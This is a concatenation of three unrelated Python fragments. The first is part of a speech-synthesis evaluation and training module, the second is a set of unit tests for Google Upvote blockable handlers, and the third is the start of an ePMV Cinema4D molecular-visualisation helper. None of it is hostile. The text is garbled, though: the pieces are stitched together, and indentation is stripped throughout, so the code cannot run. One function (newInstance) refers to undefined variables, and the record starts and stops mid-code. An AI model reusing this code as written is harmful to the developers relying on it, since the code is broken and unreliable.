print('Evaluated W/O sil phones ({}) F1 [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['F.total']))
write_scalar_log(nosil_aco_afpr['F.total'], 'total F1',
epoch_idx, log_writer)
print('=' * 30)
# WRITE AUDIO TO TBOARD if possible
if log_writer is not None:
tfl = tempfile.NamedTemporaryFile()
cc = preds[:, :40]
fv = preds[:, -3]
lf0 = preds[:, -2]
write_aco_file('{}.cc'.format(tfl.name), cc)
write_aco_file('{}.fv'.format(tfl.name), fv)
write_aco_file('{}.lf0'.format(tfl.name), lf0)
aco2wav('{}'.format(tfl.name))
rate, wav = wavfile.read('{}.wav'.format(tfl.name))
# norm in wav
wav = np.array(wav, dtype=np.float32) / 32767.
# trim to max of 10 seconds
wav = wav[:min(wav.shape[0], int(rate * 10))]
log_writer.add_audio('eval_synth_audio',
wav,
epoch_idx,
sample_rate=rate)
# remove tmp files
os.unlink('{}.cc'.format(tfl.name))
os.unlink('{}.fv'.format(tfl.name))
os.unlink('{}.lf0'.format(tfl.name))
os.unlink('{}.wav'.format(tfl.name))
#print('Evaluated w/ sil MCD of spks: {}'.format(json.dumps(aco_mcd,
# indent=2)))
#print('Evaluated w/o sil MCD of spks: {}'.format(json.dumps(nosil_aco_mcd,
# indent=2)))
#print('Evaluated w/ sil AFPR of spks: {}'.format(json.dumps(aco_afpr,
# indent=2)))
#print('Evaluated w/o sil AFPR of spks: '
# '{}'.format(json.dumps(nosil_aco_afpr,
# indent=2)))
# transform nosil_aco_mcd keys
new_keys_d = {}
for k in nosil_aco_mcd.keys():
if k == 'total':
# skip this key
continue
if mulout:
# transform each key into the desired loss filename
new_keys_d['mo-{}_va_mcd'.format(k)] = nosil_aco_mcd[k]
else:
# transform each key into the desired loss filename
new_keys_d['so-{}_va_mcd'.format(k)] = nosil_aco_mcd[k]
for k in nosil_aco_afpr.keys():
if k == 'total':
continue
if mulout:
new_keys_d['mo-{}_va_afpr'.format(k)] = nosil_aco_afpr[k]
else:
new_keys_d['so-{}_va_afpr'.format(k)] = nosil_aco_afpr[k]
for k in nosil_aco_f0_spk.keys():
if mulout:
new_keys_d['mo-{}_va_f0rmse'.format(k)] = nosil_aco_f0_spk[k]
else:
new_keys_d['so-{}_va_f0rmse'.format(k)] = nosil_aco_f0_spk[k]
new_keys_d.update({'total_aco_mcd':aco_mcd['total'],
'total_nosil_aco_mcd':nosil_aco_mcd['total'],
'total_aco_afpr':aco_afpr['total'],
'total_nosil_aco_afpr':nosil_aco_afpr['total'],
'total_aco_f0rmse':aco_f0_rmse,
'total_nosil_aco_f0rmse':nosil_aco_f0_rmse})
return new_keys_d
def eval_dur_epoch(model, dloader, epoch_idx, cuda=False,
stats=None, va_opts={}, log_writer=None):
model.eval()
with torch.no_grad():
sil_id = 'pau'
q_classes = False
if 'sil_id' in va_opts:
sil_id = va_opts.pop('sil_id')
if 'q_classes' in va_opts:
q_classes= va_opts.pop('q_classes')
idx2spk = None
if 'idx2spk' in va_opts:
idx2spk = va_opts.pop('idx2spk')
if 'mulout' in va_opts:
print('Multi-Output dur evaluation')
mulout = va_opts.pop('mulout')
if idx2spk is None:
raise ValueError('Specify a idx2spk in eval opts '
'when using MO.')
assert len(va_opts) == 0, 'unrecognized params passed in: '\
'{}'.format(va_opts.keys())
spk2durstats=stats
preds = None
gtruths = None
seqlens = None
spks = None
# make the silence mask
sil_mask = None
for b_idx, batch in enumerate(dloader):
# decompose the batch into the sub-batches
spk_b, lab_b, dur_b, slen_b, ph_b = batch
# build batch of curr_ph to filter out results without sil phones
# size of curr_ph_b [bsize, seqlen]
curr_ph_b = [[ph[2] for ph in ph_s] for ph_s in ph_b]
# convert all into variables and transpose (we want time-major)
spk_b = spk_b.transpose(0,1)
lab_b = lab_b.transpose(0,1)
dur_b = dur_b.transpose(0,1)
# get curr batch size
curr_bsz = spk_b.size(1)
# init hidden states of dur model
states = model.init_hidden_state(curr_bsz)
if cuda:
spk_b = var_to_cuda(spk_b)
lab_b = var_to_cuda(lab_b)
dur_b = var_to_cuda(dur_b)
slen_b = var_to_cuda(slen_b)
states = var_to_cuda(states)
# forward through model
y, states = model(lab_b, states, speaker_idx=spk_b)
if isinstance(y, dict):
# we have a MO model, pick the right spk
spk_name = idx2spk[spk_b.cpu().data[0,0]]
# print('Extracting y prediction for MO spk ', spk_name)
y = y[spk_name]
y = y.squeeze(-1)
preds, gtruths, \
spks, sil_mask = predict_masked_rmse(y, dur_b, slen_b,
spk_b, curr_ph_b,
preds, gtruths,
spks, sil_mask,
sil_id,
q_classes)
# denorm with normalization stats
assert spk2durstats is not None
preds, gtruths = denorm_dur_preds_gtruth(preds, gtruths,
spks, spk2durstats,
q_classes)
write_histogram_log(preds, 'eval_preds_rmse',
epoch_idx, log_writer)
write_histogram_log(gtruths, 'eval_gtruths_rmse',
epoch_idx, log_writer)
dur_rmse, spks_rmse = rmse(preds, gtruths, spks)
dur_rmse *= 1e3
for k, v in spks_rmse.items():
spks_rmse[k] = v * 1e3
nosil_dur_rmse, \
nosil_spks_rmse = rmse(preds * sil_mask,
gtruths * sil_mask, spks)
nosil_dur_rmse *= 1e3
nosil_spkname_rmse = {}
for k, v in nosil_spks_rmse.items():
#nosil_spks_rmse[k] = v * 1e3
nosil_spkname_rmse[idx2spk[int(k)]] = v * 1e3
write_scalar_log(v * 1e3,
'eval_nosil_{}_rmse'.format(idx2spk[int(k)]),
epoch_idx, log_writer)
#print('Evaluated dur mRMSE [ms]: {:.3f}'.format(dur_rmse))
print('Evaluated dur w/o sil phones mRMSE [ms]:'
'{:.3f}'.format(nosil_dur_rmse))
print('Evaluated dur of spks: {}'.format(json.dumps(nosil_spkname_rmse,
indent=2)))
nosil_spkname_rmse.update({'eval_total_dur_rmse':dur_rmse,
'eval_total_nosil_dur_rmse':nosil_dur_rmse})
write_scalar_log(dur_rmse,
'eval_total_dur_rmse',
epoch_idx, log_writer)
write_scalar_log(nosil_dur_rmse,
'eval_total_nosil_dur_rmse',
epoch_idx, log_writer)
return nosil_spkname_rmse
def train_attaco_epoch(model, dloader, opt, log_freq, epoch_idx,
criterion=None, cuda=False, tr_opts={},
spk2acostats=None, log_writer=None):
model.train()
global_step = epoch_idx * len(dloader)
# At the moment, acoustic training is always stateful
spk2acostats = None
if 'spk2acostats' in tr_opts:
print('Getting spk2acostats')
spk2acostats = tr_opts.pop('spk2acostats')
idx2spk = None
if 'idx2spk' in tr_opts:
idx2spk = tr_opts.pop('idx2spk')
| |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for blockable handlers."""
import datetime
import httplib
import mock
import webapp2
from google.appengine.ext import ndb
from upvote.gae.datastore import test_utils
from upvote.gae.datastore import utils
from upvote.gae.datastore.models import base
from upvote.gae.datastore.models import bit9
from upvote.gae.datastore.models import santa
from upvote.gae.modules.upvote_app.api.handlers import blockables
from upvote.gae.shared.common import basetest
from upvote.shared import constants
class BlockablesTest(basetest.UpvoteTestCase):
"""Base class for Audit Logs handler tests."""
def setUp(self, app):
super(BlockablesTest, self).setUp(wsgi_app=app)
self.bit9_blockable = test_utils.CreateBit9Binary(
id='zzzzzzzzzaaa',
id_type=constants.ID_TYPE.SHA256,
file_name='Mac.app.exe')
self.bit9_blockable2 = test_utils.CreateBit9Binary(
id='zzzzzzzzzbbb',
id_type=constants.ID_TYPE.SHA256,
file_name='app.exe')
self.generic_blockable = test_utils.CreateBlockable(
file_name='Not4Mac.exe',
state=constants.STATE.SUSPECT)
self.santa_blockable = test_utils.CreateSantaBlockable(
publisher='Arple',
product_name='New Shiny',
flagged=True)
self.santa_certificate = test_utils.CreateSantaCertificate(
id_type=constants.ID_TYPE.SHA256,
common_name='Best Cert Ever',
organization='Totally Legit CA')
self.PatchValidateXSRFToken()
class BlockableQueryHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication([
webapp2.Route('/<platform>/<blockable_type>',
handler=blockables.BlockableQueryHandler)])
super(BlockableQueryHandlerTest, self).setUp(app)
def testAdminGetList(self):
"""Admin getting list of all blockables."""
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all')
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 5)
def testAdminGetListWithPlatform(self):
"""Admin getting list of all blockables on a specific platform."""
with self.LoggedInUser(admin=True):
response = self.testapp.get('/santa/certificates')
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testUserGetBlockableList(self):
"""Normal user getting a list of all blockables."""
with self.LoggedInUser():
self.testapp.get('/all/all', status=httplib.FORBIDDEN)
def testUserGetFlaggedBlockables(self):
"""Normal user getting a list of flagged blockables."""
params = {'filter': 'flagged'}
with self.LoggedInUser():
self.testapp.get('/all/all', params, status=httplib.FORBIDDEN)
def testUserGetSuspectBlockables(self):
"""Normal user getting a list of suspect blockables."""
params = {'filter': 'suspect'}
with self.LoggedInUser():
self.testapp.get('/all/all', params, status=httplib.FORBIDDEN)
def testUserGetOwnBlockables(self):
user_1 = test_utils.CreateUser()
user_2 = test_utils.CreateUser()
# Create two events for this user.
test_utils.CreateBit9Event(
self.bit9_blockable,
executing_user=user_2.nickname,
host_id='a_host_id',
parent=utils.ConcatenateKeys(
user_2.key, ndb.Key('Host', 'a_host_id'),
self.santa_blockable.key)
)
host_id = 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC'
test_utils.CreateSantaEvent(
self.santa_blockable,
executing_user=user_2.nickname,
event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN,
file_name='Product.app',
file_path='/Applications/Product.app/Contents/MacOs',
host_id=host_id,
last_blocked_dt=datetime.datetime(2015, 4, 1, 1, 0, 0),
first_blocked_dt=datetime.datetime(2015, 4, 1, 1, 0, 0),
parent=utils.ConcatenateKeys(
user_2.key, ndb.Key('Host', host_id),
self.santa_blockable.key)
)
# Create one event for another user. This should not be included in
# the results when fetching blockables for user_2.
test_utils.CreateBit9Event(
self.bit9_blockable2,
executing_user=user_1.nickname,
file_name='notepad++.exe',
file_path=r'c:\program files (x86)\notepad++',
host_id='a_host_id',
last_blocked_dt=datetime.datetime(2015, 5, 1, 1, 0, 0),
first_blocked_dt=datetime.datetime(2015, 5, 1, 1, 0, 0),
parent=utils.ConcatenateKeys(
user_1.key, ndb.Key('Host', 'a_host_id'),
self.santa_blockable.key)
)
params = {'filter': 'own'}
with self.LoggedInUser(user=user_2):
response = self.testapp.get('/all/all', params)
output = response.json
# Verify that only two blockables (from the two events) are returned to
# this user.
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 2)
def testUserGetOwnBlockables_UserHasNoBlockables(self):
params = {'filter': 'own'}
with self.LoggedInUser():
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 0)
def testAdminGetListOfFlaggedBlockables(self):
"""Admin getting a list of flagged blockables."""
params = {'filter': 'flagged'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetListOfSuspectBlockables(self):
"""Admin getting a list of flagged blockables."""
params = {'filter': 'suspect'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByFileName(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'Not4Mac.exe', 'searchBase': 'fileName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertTrue(isinstance(output, dict))
self.assertTrue(isinstance(output['content'], list))
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByPublisher(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'Arple', 'searchBase': 'publisher'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertTrue(isinstance(output, dict))
self.assertTrue(isinstance(output['content'], list))
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByProductName(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'New Shiny', 'searchBase': 'productName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertTrue(isinstance(output, dict))
self.assertTrue(isinstance(output['content'], list))
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryPlatform(self):
"""Admin searching for a blockable by platform."""
params = {'search': 'New Shiny', 'searchBase': 'productName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/santa/binaries', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertTrue(isinstance(output, dict))
self.assertTrue(isinstance(output['content'], list))
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByUnknown(self):
"""Admin searching for a blockable by an unknown property."""
params = {'search': 'ProbablyNotReal', 'searchBase': 'notReal'}
with self.LoggedInUser(admin=True):
self.testapp.get('/all/all', params, status=httplib.BAD_REQUEST)
def testAdminGetQueryBadPlatform(self):
"""Admin searching by a property not valid for the specified platform."""
params = {'search': 'DoesntMatter', 'searchBase': 'bundle_id'}
with self.LoggedInUser(admin=True):
self.testapp.get('/bit9/binaries', params, status=httplib.BAD_REQUEST)
class BlockableHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route('/<blockable_id>',
handler=blockables.BlockableHandler)])
super(BlockableHandlerTest, self).setUp(app)
def testUserGetGenericByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.generic_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.generic_blockable.file_name)
self.assertIsNone(output.get('operating_system_family'))
self.assertIn('Blockable', output['class_'])
def testUserGetSantaBlockableByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.santa_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.santa_blockable.file_name)
self.assertEqual(
output['operatingSystemFamily'], constants.PLATFORM.MACOS)
self.assertIn('Blockable', output['class_'])
self.assertIn('SantaBlockable', output['class_'])
def testUserGetBit9BinaryByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.bit9_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['id'], self.bit9_blockable.key.id())
self.assertEqual(output['fileName'], self.bit9_blockable.file_name)
self.assertEqual(
output['operatingSystemFamily'], constants.PLATFORM.WINDOWS)
self.assertIn('Blockable', output['class_'])
self.assertIn('Bit9Binary', output['class_'])
def testUserGetSantaCertificateByID(self):
"""Normal user querying for a cert by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.santa_certificate.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(
output['commonName'], self.santa_certificate.common_name)
self.assertIn('Blockable', output['class_'])
self.assertIn('SantaCertificate', output['class_'])
def AddBlockableToDatastore(self, *args):
test_utils.CreateSantaBlockable(id='NotYetSynced')
return mock.Mock(status_code=httplib.OK)
def testUserGetUnknownId_Santa(self):
with self.LoggedInUser():
self.testapp.get('/Nonexistent', status=httplib.NOT_FOUND)
def testAdminPostCallRecount(self):
"""Admin requesting a recount for a blockable."""
# Create an anomalous global blacklist rule that should be deactivated by
# the recount.
rule = test_utils.CreateSantaRule(self.santa_blockable.key)
self.assertTrue(rule.in_effect)
id_ = self.santa_blockable.key.id()
params = {'recount': 'recount'}
with self.LoggedInUser(admin=True):
response = self.testapp.post('/' + id_, params)
self.assertFalse(rule.key.get().in_effect)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.santa_blockable.file_name)
self.assertIn('Blockable', output['class_'])
def testAdminPostReset(self):
"""Admin requesting a blockable be reset."""
id_ = self.generic_blockable.key.id()
params = {'reset': 'reset'}
with self.LoggedInUser(admin=True):
with mock.patch.object(
blockables.BlockableHandler, '_reset_blockable') as mock_method:
_ = self.testapp.post('/' + id_, params)
mock_method.assert_called_once_with(id_)
def testAdminPostInsertUnknownType(self):
"""Admin tries to inject a blockable of unknown type."""
id_ = 'qqqqrrrrsssstttt'
params = {'type': 'mock_blockable', 'hash': id_}
with mock.patch.object(blockables, 'model_mapping') as mock_mapping:
mock_mapping.BlockableTypeModelMap.mock_blockable = None
with self.LoggedInUser(admin=True):
self.testapp.post('/' + id_, params, status=httplib.BAD_REQUEST)
def testAdminPostInsertExistingID(self):
"""Admin tries to inject an existing blockable."""
id_ = self.generic_blockable.key.id()
params = {'type': 'Blockable', 'hash': id_}
with mock.patch.object(blockables, 'model_mapping'):
with self.LoggedInUser(admin=True):
self.testapp.post('/' + id_, params, status=httplib.CONFLICT)
def testAdminPostInsert(self):
"""Admin posting a valid blockable."""
id_ = 'qqqqrrrrsssstttt'
params = {
'type': constants.BLOCKABLE_TYPE.SANTA_BINARY,
'fileName': 'MacIIci.app',
'publisher': 'Arple'}
mock_model = mock.MagicMock()
mock_model.get_by_id.return_value = False
test_blockable = test_utils.CreateBlockable(id=id_)
mock_model.get_or_insert.return_value = test_blockable
with mock.patch.object(blockables, 'model_mapping') as mock_mapping:
mock_mapping.BlockableTypeModelMap.SANTA_BINARY = mock_model
with self.LoggedInUser(admin=True):
response = self.testapp.post('/%s' % id_, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertEqual(output['id'], 'qqqqrrrrsssstttt')
mock_model.get_or_insert.assert_called_with(
'qqqqrrrrsssstttt',
file_name='MacIIci.app',
publisher='Arple',
flagged=False,
id_type=constants.ID_TYPE.SHA256
)
def testAdminPostInsert_Note(self):
"""Admin posting a valid blockable."""
id_ = 'qqqqrrrrsssstttt'
params = {
'notes': 'foo',
'fileName': 'bar',
'type': constants.BLOCKABLE_TYPE.SANTA_BINARY}
with self.LoggedInUser(admin=True):
self.testapp.post('/%s' % id_, params)
blockable = base.Blockable.get_by_id(id_)
self.assertEqual('bar', blockable.file_name)
self.assertEntityCount(base.Note, 1)
note = base.Note.query().fetch()[0]
self.assertEqual(note.message, 'foo')
self.assertEqual(note.key.parent(), blockable.key)
def testResetBlockable(self):
"""Test private reset method."""
# Create a vote and trigger a recount on the blockable to update the score.
test_utils.CreateVote(self.santa_blockable)
self.santa_blockable.put()
# Ensure Vote properly updated the blockable score.
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(output['id'], self.santa_blockable.key.id())
self.assertEqual(output['score'], 1)
# Issue a reset and ensure the resulting score is 0.
params = {'reset': 'reset'}
response = self.testapp.post(
'/%s' % self.santa_blockable.key.id(), params)
output = response.json
self.assertEqual(output['id'], self.santa_blockable.key.id())
self.assertEqual(output['score'], 0)
class AuthorizedHostCountHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route(r'/<blockable_id>',
handler=blockables.AuthorizedHostCountHandler)])
super(AuthorizedHostCountHandlerTest, self).setUp(app)
def testGloballyWhitelisted(self):
self.santa_blockable.state = constants.STATE.GLOBALLY_WHITELISTED
self.santa_blockable.put()
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(-1, output)
def testNone(self):
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(0, output)
def testNormal(self):
expected = 3
for i in xrange(expected):
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.WHITELIST,
host_id='host%s' % i)
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.BLACKLIST)
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.WHITELIST,
in_effect=False)
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(expected, output)
def testBlockableNotFound(self):
with self.LoggedInUser(admin=True):
self.testapp.get('/NotARealBlockable', status=httplib.NOT_FOUND)
def testBadBlockableType(self):
with self.LoggedInUser(admin=True):
self.testapp.get(
'/%s' % self.bit9_blockable.key.id(), status=httplib.BAD_REQUEST)
def testNoPermission(self):
with self.LoggedInUser():
self.testapp.get(
'/%s' % self.santa_blockable.key.id(), status=httplib.FORBIDDEN)
class UniqueEventCountHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route(r'/<blockable_id>',
handler=blockables.UniqueEventCountHandler)])
super(UniqueEventCountHandlerTest, self).setUp(app)
def testBinary_Normal(self):
test_utils.CreateSantaEvent(self.santa_blockable)
with self.LoggedInUser():
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(1, output)
def testCert_Normal(self):
test_utils.CreateSantaEvent(
self.santa_blockable,
cert_sha256=self.santa_certificate.key.id())
with self.LoggedInUser():
response = self.testapp.get('/%s' % self.santa_certificate.key.id())
output = response.json
self.assertEqual(1, output)
| |
#!/usr/bin/python
#TODO
#symserv == cloner Object linear for helix, radial for symNFold
#how comunicate this woth pmv....like vision ... only need ever node name/log or matrice
#color By vertex!!
#C4d module
import c4d
import c4d.symbols as sy
#import c4d.documents
#import c4d.plugins
#from c4d import plugins
#from c4d import tools
#from c4d.gui import *
#from c4d.plugins import *
#standardmodule
import numpy
import numpy.oldnumeric as Numeric
import sys, os, os.path, struct, math, string
import types
import math
from math import *
from types import StringType, ListType
#this id can probably found in c4d.symbols
#TAG ID
POSEMIXER = 100001736
IK = 1019561
PYTAG = 1022749
Follow_PATH = 5699
LOOKATCAM = 1001001
SUNTAG=5678
#OBJECT ID
INSTANCE = 5126
BONE = 1019362
CYLINDER = 5170
CIRCLE = 5181
RECTANGLE = 5186
FOURSIDE = 5180
LOFTNURBS= 5107
SWEEPNURBS=5118
TEXT = 5178
CLONER = 1018544
MOINSTANCE = 1018957
ATOMARRAY = 1001002
METABALLS = 5125
LIGHT = 5102
CAMERA = 5103
#PARAMS ID
PRIM_SPHERE_RAD = 1110
#MATERIAL ATTRIB
LAYER=1011123
GRADIANT=1011100
FUSION = 1011109
#COMMAND ID
OPTIMIZE = 14039
VERBOSE=0
DEBUG=0
#MGLTOOLS module
import MolKit
from MolKit.molecule import Atom, AtomSet, BondSet, Molecule , MoleculeSet
from MolKit.protein import Protein, ProteinSet, Residue, Chain, ResidueSet,ResidueSetSelector
from MolKit.stringSelector import CompoundStringSelector
from MolKit.tree import TreeNode, TreeNodeSet
from MolKit.molecule import Molecule, Atom
from MolKit.protein import Residue
#PMV module
from Pmv.moleculeViewer import MoleculeViewer
from Pmv.displayCommands import BindGeomToMolecularFragment
from Pmv.trajectoryCommands import PlayTrajectoryCommand
#Pmv Color Palette
from Pmv.pmvPalettes import AtomElements
from Pmv.pmvPalettes import DavidGoodsell, DavidGoodsellSortedKeys
from Pmv.pmvPalettes import RasmolAmino, RasmolAminoSortedKeys
from Pmv.pmvPalettes import Shapely
from Pmv.pmvPalettes import SecondaryStructureType
from Pmv.pmvPalettes import DnaElements
#computation
#from Pmv.amberCommands import Amber94Config, CurrentAmber94
from Pmv.hostappInterface import comput_util as C
from Pmv.hostappInterface import cinema4d as epmvc4d
plugDir=epmvc4d.__path__[0]
SSShapes={ 'Heli':FOURSIDE,
'Shee':RECTANGLE,
'Coil':CIRCLE,
'Turn':CIRCLE,
'Stra':RECTANGLE
}
SSColor={ 'Heli':(238,0,127),
'Shee':(243,241,14),
'Coil':(255,255,255),
'Turn':(60,26,100),
'Stra':(255,255,0)}
#NOTES
#[900] <-> SetName
AtmRadi = {"A":"1.7","N":"1.54","C":"1.7","CA":"1.7","O":"1.52","S":"1.85","H":"1.2","P" : "1.04"}
DGatomIds=['ASPOD1','ASPOD2','GLUOE1','GLUOE2', 'SERHG',
'THRHG1','TYROH','TYRHH',
'LYSNZ','LYSHZ1','LYSHZ2','LYSHZ3','ARGNE','ARGNH1','ARGNH2',
'ARGHH11','ARGHH12','ARGHH21','ARGHH22','ARGHE','GLNHE21',
'GLNHE22','GLNHE2',
'ASNHD2','ASNHD21', 'ASNHD22','HISHD1','HISHE2' ,
'CYSHG', 'HN']
def lookupDGFunc(atom):
assert isinstance(atom, Atom)
if atom.name in ['HN']:
atom.atomId = atom.name
else:
atom.atomId=atom.parent.type+atom.name
if atom.atomId not in DGatomIds:
atom.atomId=atom.element
if atom.atomId not in AtmRadi.keys() : atom.atomId="A"
return atom.atomId
ResidueSelector=ResidueSetSelector()
def start(debug=0):
if VERBOSE : print "start ePMV - debug ",debug
mv = MoleculeViewer(logMode = 'unique', customizer=None, master=None,title='pmv', withShell= 0,verbose=False, gui = False)
mv.addCommand(BindGeomToMolecularFragment(), 'bindGeomToMolecularFragment', None)
mv.browseCommands('trajectoryCommands',commands=['openTrajectory'],log=0,package='Pmv')
#mv.browseCommands('amberCommands',package='Pmv')
mv.addCommand(PlayTrajectoryCommand(),'playTrajectory',None)
mv.embedInto('c4d',debug=debug)
mv.userpref['Read molecules as']['value']='conformations'
#DEBUG=debug
return mv
def reset_ePMV(mv, debug=0):
#need to restore the logEvent sytem for the right session
if VERBOSE : print "reset epmv debug",debug,mv
mv.embedInto('c4d',debug=debug)
def progressBar(progress,label):
#the progessbar use the StatusSetBar
c4d.StatusSetText(label)
c4d.StatusSetBar(int(progress*100.))
def resetProgressBar(value):
c4d.StatusClear()
def compareSel(currentSel,molSelDic):
for selname in molSelDic.keys():
if VERBOSE : print "The compareSelection ",currentSel,molSelDic[selname][3]
#if currentSel[-1] == ';' : currentSel=currentSel[0:-1]
if currentSel == molSelDic[selname] : return selname
def parseObjectName(o):
#problem if "_" exist the molecule name
if type(o) == str : name=o
else : name=o.GetName()
tmp=name.split("_")
if len(tmp) == 1 : #no "_" so not cpk (S_) or ball (B_) stick (T_) or Mesh (Mesh_)
return ""
else :
if tmp[0] == "S" or tmp[0] == "B" : #balls or cpk
hiearchy=tmp[1].split(":") #B_MOL:CHAIN:RESIDUE:ATOMS
return hiearchy
return ""
def parseName(o):
if type(o) == str : name=o
else : name=o.GetName()
tmp=name.split("_")
if len(tmp) == 1 : #molname
hiearchy=name.split(":")
if len(hiearchy) == 1 : return [name,""]
else : return hiearchy
else :
hiearchy=tmp[1].split(":") #B_MOL:CHAIN:RESIDUE:ATOMS
return hiearchy
#def get_editor_object_camera(doc):
# bd = doc.get_render_basedraw()
# cp = bd.get_scene_camera(doc)
# if cp is None: cp = bd.get_editor_camera()
# return cp
def getCurrentScene():
return c4d.documents.GetActiveDocument()
def update():
#getCurrentScene().GeSyncMessage(c4d.MULTIMSG_UP)
getCurrentScene().Message(c4d.MULTIMSG_UP)
c4d.DrawViews(c4d.DA_ONLY_ACTIVE_VIEW|c4d.DA_NO_THREAD|c4d.DA_NO_ANIMATION)
c4d.DrawViews(c4d.DA_NO_THREAD|c4d.DA_FORCEFULLREDRAW)
updateAppli = update
def getObjectName(o):
return o.GetName()
def getObject(name):
obj=None
if type(name) != str : return name
try :
obj=getCurrentScene().SearchObject(name)
except :
obj=None
return obj
def deleteObject(obj):
sc = getCurrentScene()
try :
print obj.GetName()
sc.SetActiveObject(obj)
c4d.CallCommand(100004787) #delete the obj
except:
print "problem deleting ", obj
def newEmpty(name,location=None,parentCenter=None,display=0,visible=0):
empty=c4d.BaseObject(c4d.Onull)
empty.SetName(name)
empty[1000] = display
empty[1001] = 1.0
if location != None :
if parentCenter != None :
location = location - parentCenter
empty.SetPos(c4dv(location))
return empty
def newInstance(name,object,location=None,c4dmatrice=None,matrice=None):
instance = c4d.BaseObject(INSTANCE)
instance[1001]=iMe[atN[0]]
instance.SetName(n+"_"+fullname)#.replace(":","_")
if location != None :
instance.SetPos(c4dv(location))
if c4dmatrice !=None :
#type of matre
instance.SetMg(c4dmatrice)
if matrice != None:
mx = matrix2c4dMat(matrice)
instance.SetMg(mx)
return instance
def setObjectMatrix(object,matrice,c4dmatrice=None):
if c4dmatrice !=None :
#type of matre
object.SetMg(c4dmatrice)
else :
mx = matrix2c4dMat(matrice,transpose=False)
object.SetMg(mx)
def concatObjectMatrix(object,matrice,c4dmatrice=None,local=True):
#local or global?
cmg = object.GetMg()
cml = object.GetMl()
if c4dmatrice !=None :
#type of matrice
if local :
object.SetMl(cml*c4dmatrice)
else :
object.SetMg(cmg*c4dmatrice)
else :
mx = matrix2c4dMat(matrice,transpose=False)
if local :
object.SetMl(cml*mx)
else :
object.SetMg(cmg*mx)
def getPosUntilRoot(obj):
stop = False
parent = obj.GetUp()
pos=c4d.Vector(0.,0.,0.)
while not stop :
pos = pos + parent.GetPos()
parent = parent.GetUp()
if parent is None :
stop = True
return pos
def addObjectToScene(doc,obj,parent=None,centerRoot=True,rePos=None):
